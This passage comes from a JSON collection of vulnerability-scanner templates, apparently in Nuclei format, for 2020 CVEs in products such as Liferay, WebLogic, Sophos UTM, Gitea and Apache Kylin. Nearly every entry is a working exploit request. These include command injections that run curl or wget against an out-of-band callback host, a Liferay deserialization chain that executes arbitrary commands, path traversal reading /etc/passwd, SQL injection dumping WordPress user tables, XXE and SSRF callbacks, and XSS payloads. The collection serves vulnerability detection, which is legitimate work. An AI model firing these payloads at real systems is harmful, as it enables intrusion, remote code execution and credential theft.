1}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-1956","info":{"name":"Apache Kylin 3.0.1 - Command Injection Vulnerability","severity":"high"},"requests":[{"raw":["POST /kylin/api/user/authentication HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64('{{username}}:' + '{{password}}')}}\n","POST /kylin/api/cubes/kylin_streaming_cube/%2031%60curl%20{{interactsh-url}}%60/migrate HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2020-20285","info":{"name":"ZZcms - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /user/login.php HTTP/1.1\nHost: {{Hostname}}\nReferer: xss\"/><img src=\"#\" onerror=\"alert(document.domain)\"/>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["fromurl\" type=\"hidden\" value=\"xss\"/><img src=\"#\" onerror=\"alert(document.domain)\"/>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24589","info":{"name":"WSO2 API Manager <=3.1.0 - Blind XML External Entity Injection","severity":"critical"},"requests":[{"raw":["POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npayload=<%3fxml+version%3d\"1.0\"+%3f><!DOCTYPE+a+[+<!ENTITY+%25+xxe+SYSTEM+\"http%3a//{{interactsh-url}}\">%25xxe%3b]>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["Failed to install the generic artifact type"]}]}]},{"id":"CVE-2020-14408","info":{"name":"Agentejo Cockpit 0.10.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/login?to=/92874%27;alert(document.domain)//280"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["redirectTo = '/92874';alert(document.domain)//280';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13700","info":{"name":"WordPresss acf-to-rest-api <=3.1.0 - Insecure Direct Object Reference","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/acf/v3/options/a?id=active&field=plugins"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: application/json"]},{"type":"word","part":"body","words":["acf-to-rest-api\\/class-acf-to-rest-api.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28188","info":{"name":"TerraMaster TOS - Unauthenticated Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1\nHost: {{Hostname}}\n","GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2020-1943","info":{"name":"Apache OFBiz <=16.11.07 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/control/stream?contentId=%27\\%22%3E%3Csvg/onload=alert(/xss/)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(/xss/)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5775","info":{"name":"Canvas LMS v2020-07-29 - Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/external_content/retrieve/oembed?endpoint=http://{{interactsh-url}}&url=foo"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-14144","info":{"name":"Gitea 1.1.0 - 1.12.5 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/create HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&uid=1&repo_name={{randstr}}&private=on&description=&repo_template=&issue_labels=&gitignores=&license=&readme=Default&auto_init=on&default_branch=master\n","POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}\n","GET /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\n","POST /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_1","words":["Gitea:"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true},{"type":"regex","name":"last_commit","group":1,"regex":["name=\"last_commit\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2020-16139","info":{"name":"Cisco Unified IP Conference Station 7937G - Denial-of-Service","severity":"high"},"requests":[{"raw":["POST /localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/xml"]},{"type":"word","words":["AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-36112","info":{"name":"CSE Bookstore 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["get book price failed! You have an error in your SQL syntax","Can't retrieve data You have an error in your SQL syntax"],"condition":"or"}]}]},{"id":"CVE-2020-17463","info":{"name":"Fuel CMS 1.4.7 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /fuel/login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /fuel/login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\n\nuser_name={{username}}&password={{password}}&Login=Login&forward=\n","@timeout: 10s\nGET /fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}\n"],"payloads":{"username":["admin"],"password":["admin"]},"attack":"pitchfork","cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_3 == 200","contains(body_1, \"FUEL CMS\")"],"condition":"and"}]}]},{"id":"CVE-2020-9344","info":{"name":"Jira Subversion ALM for Enterprise <8.8.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E","{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS","{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E","{{BaseURL}}/plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test","{{BaseURL}}/plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","jira","subversion"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15895","info":{"name":"D-Link DIR-816L 2.x - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/info.php?RESULT=\",msgArray);alert(document.domain);//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[";alert(document.domain);","DIR-816L"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-20982","info":{"name":"shadoweb wdja v1.5.1 - Cross-Site Scripting","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["location.href='</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24902","info":{"name":"Quixplorer <=2.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?action=post&order=bszop%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>&srt=yes","My Download"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14092","info":{"name":"WordPress PayPal Pro <1.1.65 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["\"user_login\"","\"user_email\"","\"user_pass\"","\"user_activation_key\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-0618","info":{"name":"Microsoft SQL Server Reporting Services - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ReportServer/Pages/ReportViewer.aspx"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["view report"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25223","info":{"name":"Sophos UTM Preauth - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /var HTTP/1.1\nHost: {{Hostname}}\nAccept: text/javascript, text/html, application/xml, text/xml, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nX-Requested-With: XMLHttpRequest\nX-Prototype-Version: 1.5.1.1\nContent-Type: application/json; charset=UTF-8\nOrigin: {{BaseURL}}\nConnection: close\nReferer: {{BaseURL}}\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\n\n{\"objs\": [{\"FID\": \"init\"}], \"SID\": \"|wget http://{{interactsh-url}}|\", \"browser\": \"gecko_linux\", \"backend_version\": -1, \"loc\": \"\", \"_cookie\": null, \"wdebug\": 0, \"RID\": \"1629210675639_0.5000855117488202\", \"current_uuid\": \"\", \"ipv6\": true}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-8191","info":{"name":"Citrix ADC/Gateway - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /menu/stapp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nX-NITRO-USER: xpyZxwy6\n\nsid=254&pe=1,2,3,4,5&appname=%0a</title><script>alert(31337)</script>&au=1&username=nsroot\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</title><script>alert(31337)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7961","info":{"name":"Liferay Portal Unauthenticated < 7.2.1 CE GA2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /api/jsonws/invoke HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData\ncmd2: {{command}}\n\ncmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth={{to_lower(rand_text_alpha(5))}}&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D\n"],"payloads":{"command":["systeminfo","lsb_release -a"]},"matchers-condition":"and","matchers":[{"type":"regex","regex":["OS Name:.*Microsoft Windows","Distributor ID:"],"condition":"or"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["Microsoft Windows (.*)","Distributor ID: (.*)"],"part":"body"}]}]},{"id":"CVE-2020-35598","info":{"name":"Advanced Comment System 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9315","info":{"name":"Oracle iPlanet Web Server 7.0.x - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2","{{BaseURL}}/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4"],"matchers-condition":"and","matchers":[{"type":"word","words":["Admin Console"]},{"type":"word","words":["serverConfigurationsGeneral","serverCertificatesGeneral"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11547","info":{"name":"PRTG Network Monitor <20.1.57.1745 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/login.htm?type=probes","{{BaseURL}}/public/login.htm?type=requests","{{BaseURL}}/public/login.htm?type=treestat"],"stop-at-first-match":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, 'Probe #1') && contains(body_2, '<span>Configuration Requests Sent</span>')"]},{"type":"word","part":"body","words":["prtg_network_monitor","Probes","Groups"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10770","info":{"name":"Keycloak <= 12.0.1 - request_uri Blind Server-Side Request Forgery (SSRF)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{{interactsh-url}}/"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-36510","info":{"name":"WordPress 15Zine <3.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35476","info":{"name":"OpenTSDB <=2.4.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://{{interactsh-url}}%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["plotted","timing","cachehit"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13820","info":{"name":"Extreme Management Center 8.4.1.24 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/OneView/view/center?a%27+type%3d+%27text%27+autofocus+onfocus%3d%27alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["autofocus onfocus='alert(document.domain)","Extreme Management Center"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2036","info":{"name":"Palo Alto Networks PAN-OS Web Interface - Cross Site-Scripting","severity":"high"},"requests":[{"raw":["GET /_404_/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(body_1), '<svg/onload=alert(document.domain)>')"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 == 200 && contains(header_2, 'text/html') && contains(tolower(body_2), '<svg/onload=alert(document.domain)>')","status_code_3 == 200 && contains(header_3, 'text/html') && contains(tolower(body_3), '<svg/onload=alert(document.domain)>')"],"condition":"or"}]}]},{"id":"CVE-2020-26073","info":{"name":"Cisco SD-WAN vManage Software - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"status","status":[200]},{"type":"regex","regex":["root:.*:0:0:"],"part":"body"}]}]},{"id":"CVE-2020-11450","info":{"name":"MicroStrategy Web 10.4 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/MicroStrategyWS/happyaxis.jsp"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Axis2 Happiness Page","Examining webapp configuration","Essential Components"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11978","info":{"name":"Apache Airflow <=1.10.10 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /api/experimental/test HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"conf\": {\"message\": \"\\\"; touch test #\"}}\n","GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_4, \"operator\":\"BashOperator\")","contains(header_4, \"application/json\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"exec_date","group":1,"regex":["\"execution_date\":\"([0-9-A-Z:+]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-13937","info":{"name":"Apache Kylin - Exposed Configuration File","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/kylin/api/admin/config"],"headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["config","kylin.metadata.url"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35774","info":{"name":"twitter-server Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/histograms?h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&fmt=plot_cdf&log_scale=true"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9483","info":{"name":"SkyWalking SQLI","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/graphql"],"body":"{\"query\":\"query SQLi($d: Duration!){globalP99:getLinearIntValues(metric: {name:\\\"all_p99\\\",id:\\\"') UNION SELECT 1,CONCAT('~','9999999999','~')-- \\\",}, duration: $d){values{value}}}\",\"variables\":{\"d\":{\"start\":\"2021-11-11\",\"end\":\"2021-11-12\",\"step\":\"DAY\"}}}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: application/json"]},{"type":"word","part":"body","words":["UNION SELECT 1,CONCAT('~','9999999999','~')--","Exception while fetching data"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26876","info":{"name":"WordPress WP Courses Plugin Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/lesson/1"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["rest_post_invalid_id","\"(guid|title|content|excerpt)\":{\"rendered\":"],"condition":"or"},{"type":"status","status":[200,404],"condition":"or"}]}]},{"id":"CVE-2020-35713","info":{"name":"Belkin Linksys RE6500 <1.0.012.001 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /goform/setSysAdm HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/login.shtml\n\nadmuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-28351","info":{"name":"Mitel ShoreTel 19.46.1802.0 Devices - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["Content-Type: text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13927","info":{"name":"Airflow Experimental <1.10.11 - REST API Auth Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/experimental/latest_runs"],"matchers":[{"type":"word","part":"body","words":["\"dag_run_url\":","\"dag_id\":","\"items\":"],"condition":"and"}]}]},{"id":"CVE-2020-24949","info":{"name":"PHP-Fusion 9.03.50 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/infusions/downloads/downloads.php?cat_id=${system(ls)}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["infusion_db.php"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5192","info":{"name":"Hospital Management System 4.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /hospital/hms/doctor/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}password={{password}}&submit=&submit=\n","POST /hospital/hms/doctor/search.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearchdata='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT(md5({{num}}),1),2),NULL--+PqeG&search=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14882","info":{"name":"Oracle Weblogic Server - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://{{interactsh-url}}')"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["ADMINCONSOLESESSION"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-11529","info":{"name":"Grav <1.7  - Open 